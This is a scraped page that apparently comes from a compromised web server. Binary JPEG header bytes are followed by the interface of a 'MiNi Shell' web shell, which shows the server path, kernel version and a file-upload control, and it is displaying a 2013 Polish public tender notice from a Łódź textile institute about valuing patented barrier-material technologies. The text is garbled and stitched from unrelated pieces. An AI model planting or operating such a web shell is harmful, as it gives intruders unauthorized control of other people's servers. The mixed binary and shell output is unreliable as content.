JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130311/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130311/36881-N-2013.html

<p class="kh_header"><b>Łódź: Usługa wykonania wyceny.</b><br>
<b>Numer ogłoszenia: 36881 - 2013; data zamieszczenia: 11.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Włókiennictwa , ul. Brzezińska 5/15, 92-103 Łódź, woj. łódzkie, tel. 042 6163103, faks 042 6792638.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iw.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytut badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa wykonania wyceny..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa wykonania wyceny.
Zadanie 1:
1.Wycena procesu technologicznego przeznaczonego do komercjalizacji (w tym wycena urządzenia i gotowego produktu) - wraz z badaniem rynku.
2.Ocena możliwości wdrożenia do praktyki przemysłowej w kraju technologii  opracowanej w ramach tematu.
3.Analiza ekonomiczna dla wybranych przedsiębiorstw (wdrażających technologię wytwarzania włókienniczych materiałów barierowych przed PEM metodą rozpylania magnetronowego).    
 Szczegółową charakterystykę przedmiotu zamówienia zawiera załącznik nr 6 do specyfikacji istotnych warunków zamówienia (dalej: siwz). 
                                                                                                                                          
Zadanie 2:
Wycena rynkowa wytypowanych rezultatów projektu przewidzianych do komercjalizacji.
I.Wykonanie wyceny rynkowej trzech technologii  według wynalazków: 
1.Sposób wytwarzania barierowych materiałów włókienniczych - Zgłoszenie patentowe P 393076 z dnia 29.11.2010 r., przekształcone 28.11.2011 r. na PCT/PL2011/000120. 
2.Nowe reaktywowane absorbery promieniowania ultrafioletowego zwiększające właściwości barierowe wyrobów z włókien celulozowych oraz sposób ich wytwarzania - Zgłoszenie patentowe P 394 616 z dnia 19.04.2011 r. przekształcone 13.04.2012 r. na EP 12 460016.4.  
3.Nowe absorbery promieniowania ultrafioletowego pochodne symetrycznej 1,3,5-triazyny wykazujące powinowactwo do włókien celulozowych oraz sposób ich wytwarzania - Zgłoszenie patentowe P-401025 z dnia 2.10.2012 r.. 
opracowanych w ramach POIG Barierowe materiały nowej generacji, chroniące człowieka przed szkodliwym działaniem środowiska, Temat II Materiały barierowe chroniące przed szkodliwym działaniem środowiska.
II. Ustalenia metody/ścieżki komercjalizacji w/w  technologii.
III.Oszacowanie kosztów ustalonej ścieżki komercjalizacji dla  w/w technologii
Szczegółową charakterystykę przedmiotu zamówienia zawiera załącznik nr 6 do specyfikacji istotnych warunków zamówienia (dalej: siwz)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.22.10.00-0, 79.40.00.00-8, 79.30.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dot. Zadania nr 1:
w okresie ostatnich 3 lat wykonali należycie co najmniej 1 usługę wyceny rynkowej rezultatów prac badawczych lub rozwojowych wraz z oceną możliwości wdrożenia ich wyników, w której zakres wchodziło co najmniej oszacowanie kosztów wytworzenia produkcyjnej wersji opracowanego w trakcie badań prototypowego urządzenia jak również wycena rynkowa know-how oraz procesu technologicznego realizowanego z wykorzystaniem tego urządzenia.
Wycena ta powinna dotyczyć branży budowy maszyn i urządzeń, materiałów technicznych lub branży nowych materiałów dla budownictwa.
dot. Zadania nr 2:
w okresie ostatnich 3 lat wykonali należycie co najmniej 2 usługi wyceny rynkowej innowacyjnej technologii uzyskanej w drodze przeprowadzenia prac badawczych. Wycena ta musiała obejmować co najmniej jedną technologię chronioną patentem w branży chemicznej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dot. Zadania nr 1: 
Dysponują lub będą dysponować co najmniej 1 osobą która:
-posiada udokumentowaną wiedzę (studia lub szkolenia) z dziedziny urządzeń mechanicznych sterowanych elektronicznie, w tym posiada znajomość technik PVD (Physical Vapor Deposition)
- posiada doświadczenie w realizacji usług wyceny z co najmniej jednego z podanych zakresów: urządzeń mechanicznych sterowanych elektronicznie, innowacyjnych procesów technologicznych, nowych wyrobów technicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz oświadczeń i dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu.
I.W celu potwierdzenia spełniania tych warunków Wykonawcy wraz z ofertą muszą przedstawić poniższe oświadczenia i dokumenty:
1)Oświadczenie o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do siwz).
2)Oświadczenie o braku podstaw do wykluczenia z postępowania (załącznik nr 3 do siwz).
3)Listę podmiotów należących do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. 2007 nr 50, poz. 331, z późn. zm.) co Wykonawca składający ofertę albo informację o tym, że nie należy do grupy kapitałowej (załącznik nr 4a i 4b do siwz - załączyć do oferty tą informację, która dotyczy Wykonawcy składającego ofertę).
4)Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy PZP  wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5)Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6)Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
7)Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów wskazanych w:
a)pkt 4-6 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
-nie otwarto jego likwidacji ani nie ogłoszono jego upadłości (ad. pkt 4), wystawiony nie wcześniej niż 6 miesięcy przed terminem składania ofert,
-nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (ad. pkt 5 i 6), wystawiony nie wcześniej niż 3 miesiące przed terminem składania ofert,
8)Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 7, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem. Wymagania z pkt 7 co do terminu wystawienia stosuje się odpowiednio
9)Wykaz według wzoru określonego w załączniku nr 1B do siwz - wykonanych głównych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia określonego w § 6 ust. I pkt. 1 lit. a, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, z podaniem jej wartości, przedmiotu, daty wykonania i podmiotów, na rzecz których zostały wykonane, oraz załączaniem dowodów, czy zostały wykonane należycie.
Dowodami tymi mogą być:
a)poświadczenie,
b)oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia 
10)dot. jedynie zadania nr 1:  Wykaz według wzoru określonego w załączniku nr 1C do siwz - osób, które będą uczestniczyć w wykonaniu zamówienia, w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia określonego w § 6 ust. I pkt. 1 lit. b, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informację o podstawie do dysponowania tymi osobami.
11)W przypadku gdy Wykonawca przy realizacji zamówienia polegał będzie na zasobach (wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych) innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawić w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (art. 26 ust. 2 b) PZP).
II.Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu lub potwierdzające, że oferowane zamówienie odpowiada wymaganiom Zamawiającego, należy składać w formie oryginału lub kopii potwierdzonej (na każdej stronie) za zgodność z oryginałem przez osobę uprawnioną do reprezentowania Wykonawcy (§7 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013r., poz. 231).
III.Wykonawca, w miejsce poświadczeń, o których mowa w pkt. I ppkt. 9 lit. a niniejszego paragrafu może przedkładać dokumenty potwierdzające należyte wykonanie usług określone w par 1 ust. 1 pkt. 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2009 r., nr 226 poz. 1817.  
IV.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których polega Wykonawca wykazując spełnianie warunków udziału w postępowaniu, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów muszą poświadczyć ( na każdej stronie) za zgodność z oryginałem odpowiednio Wykonawca lub te podmioty.
V.Dokumenty sporządzone w języku obcym należy składać wraz z tłumaczeniem na język polski.
VI.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo pełnomocnika do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
VII.Wszelkie pełnomocnictwa muszą być złożone w oryginale lub innej formie kopii poświadczonej za zgodność z oryginałem przez notariusza.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Istotne postanowienia umowy zawarte są w projekcie umowy stanowiącym załącznik nr 5 do specyfikacji.
2.Dopuszcza się zmianę całkowitej wartości brutto umowy w przypadku gdy po dniu zawarcia umowy zostanie zmieniona stawka podatku od towarów i usług (VAT) w stosunku do stawki określonej w ofercie.
3.Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że zmiana ta została przewidziana w treści ogłoszenia o zamówieniu lub w siwz, a zamawiający określił warunki takiej zmiany (art. 144 ust. 1 PZP).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.iw.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Włókiennictwa ul. Brzezińska 5/15, 92-103 Łódź, II piętro p. 209.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2013 godzina 10:00, miejsce: Instytut Włókiennictwa ul. Brzezińska 5/15, 92-103 Łódź sekretariat, I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt jest współfinansowany ze środków Unii Europejskiej w ramach projektu kluczowego POIG.01.03.01-00-006/08 Barierowe materiały nowej generacji chroniące człowieka przed szkodliwym oddziaływaniem środowiska - Envirotex.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1:
1.Wycena procesu technologicznego przeznaczonego do komercjalizacji (w tym wycena urządzenia i gotowego produktu) - wraz z badaniem rynku.
2.Ocena możliwości wdrożenia do praktyki przemysłowej w kraju technologii  opracowanej w ramach tematu.
3.Analiza ekonomiczna dla wybranych przedsiębiorstw (wdrażających technologię wytwarzania włókienniczych materiałów barierowych przed PEM metodą rozpylania magnetronowego).    
 Szczegółową charakterystykę przedmiotu zamówienia zawiera załącznik nr 6 do specyfikacji istotnych warunków zamówienia (dalej: siwz)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.22.10.00-0, 79.40.00.00-8, 79.30.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 98.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. termin realizacji usługi - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2:
Wycena rynkowa wytypowanych rezultatów projektu przewidzianych do komercjalizacji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2:
Wycena rynkowa wytypowanych rezultatów projektu przewidzianych do komercjalizacji.
I.Wykonanie wyceny rynkowej trzech technologii  według wynalazków: 
1.Sposób wytwarzania barierowych materiałów włókienniczych - Zgłoszenie patentowe P 393076 z dnia 29.11.2010 r., przekształcone 28.11.2011 r. na PCT/PL2011/000120. 
2.Nowe reaktywowane absorbery promieniowania ultrafioletowego zwiększające właściwości barierowe wyrobów z włókien celulozowych oraz sposób ich wytwarzania - Zgłoszenie patentowe P 394 616 z dnia 19.04.2011 r. przekształcone 13.04.2012 r. na EP 12 460016.4.  
3.Nowe absorbery promieniowania ultrafioletowego pochodne symetrycznej 1,3,5-triazyny wykazujące powinowactwo do włókien celulozowych oraz sposób ich wytwarzania - Zgłoszenie patentowe P-401025 z dnia 2.10.2012 r.. 
opracowanych w ramach POIG Barierowe materiały nowej generacji, chroniące człowieka przed szkodliwym działaniem środowiska, Temat II Materiały barierowe chroniące przed szkodliwym działaniem środowiska.
II.Ustalenia metody/ścieżki komercjalizacji w/w  technologii.
III.Oszacowanie kosztów ustalonej ścieżki komercjalizacji dla  w/w technologii
Szczegółową charakterystykę przedmiotu zamówienia zawiera załącznik nr 6 do specyfikacji istotnych warunków zamówienia (dalej: siwz)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.22.10.00-0, 79.40.00.00-8, 79.30.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 77.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin realizacji usługi - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com